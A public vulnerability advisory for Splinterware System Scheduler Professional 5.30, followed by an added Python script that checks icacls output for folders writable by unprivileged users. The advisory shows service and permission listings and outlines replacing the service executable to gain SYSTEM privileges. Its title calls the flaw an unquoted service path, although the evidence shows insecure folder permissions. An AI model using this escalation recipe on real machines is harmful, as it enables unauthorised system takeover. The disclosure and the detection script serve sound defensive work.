Authored by Andrea Intilangelo

Splinterware System Scheduler Professional version 5.30 suffers an unquoted service path vulnerability.

# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path
# Date: 2021-05-11
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.splinterware.com
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Version: 5.30 Professional
# Tested on: Windows 10 Pro 20H2 x64

System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions on the
location from which the service 'WindowsScheduler' calls its executable. Since the service runs as Local System, a
non-privileged user could execute arbitrary code with elevated privileges (system level privileges as
"nt authority\system"): after renaming the WService.exe file located in the software's path and replacing it with a
malicious file, the new one will be executed after a short while.

C:\Users\test>sc qc WindowsScheduler
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: WindowsScheduler
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 0 IGNORE
NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : System Scheduler Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem

C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1
C:\PROGRA~2\SYSTEM~1 BUILTIN\Users:(RX,W)
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)

Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file

C:\Users\test>
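
A defender-side check for the condition shown in the icacls listing above, as an added example that is not part of the original advisory: it parses icacls output and reports ACEs that give a principal outside an allow-list write access to a service folder. The function name, the allow-list and the set of rights treated as write access are assumptions of this example; the sample is the advisory's listing with path separators restored and the app-package entries left out.

```python
import re

# icacls rights tokens treated here as write, modify or delete access (assumption).
WRITE = {"F", "M", "W", "D", "GW", "GA", "WD", "AD", "DC", "DE", "WDAC", "WO"}
# Principals expected to hold such access (assumed allow-list, compared upper-case).
TRUSTED = {"NT SERVICE\\TRUSTEDINSTALLER", "NT AUTHORITY\\SYSTEM",
           "BUILTIN\\ADMINISTRATORS", "CREATOR OWNER"}

SAMPLE_PATH = r"C:\PROGRA~2\SYSTEM~1"
# Listing taken from the advisory; app-package ACEs omitted for brevity.
SAMPLE = r"""
C:\PROGRA~2\SYSTEM~1 BUILTIN\Users:(RX,W)
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""

def writable_aces(path, listing):
    """Return allow ACEs that grant write-type rights to non-allow-listed principals."""
    findings = []
    for line in listing.splitlines():
        line = line.strip()
        if line.upper().startswith(path.upper()):
            line = line[len(path):].strip()   # first ACE shares a line with the path
        who, sep, rest = line.partition(":(")
        if not sep or who.upper() in TRUSTED:
            continue                          # prompt/status line, or trusted principal
        # Flatten "(OI)(CI)(IO)(GR,GW,GE)" into {"OI", "CI", "IO", "GR", "GW", "GE"}.
        tokens = {t.strip() for group in re.findall(r"\(([^)]*)\)", "(" + rest)
                  for t in group.split(",")}
        if "DENY" in tokens or not tokens & WRITE:
            continue
        findings.append({"principal": who, "write_rights": sorted(tokens & WRITE),
                         "inherited": "I" in tokens,      # (I): comes from the parent
                         "inherit_only": "IO" in tokens})  # (IO): applies to children
    return findings

if __name__ == "__main__":
    for finding in writable_aces(SAMPLE_PATH, SAMPLE):
        print(finding)
```

On the advisory's listing this reports the two BUILTIN\Users entries that carry no (I) flag, that is, ACEs set explicitly on the folder rather than inherited from its parent.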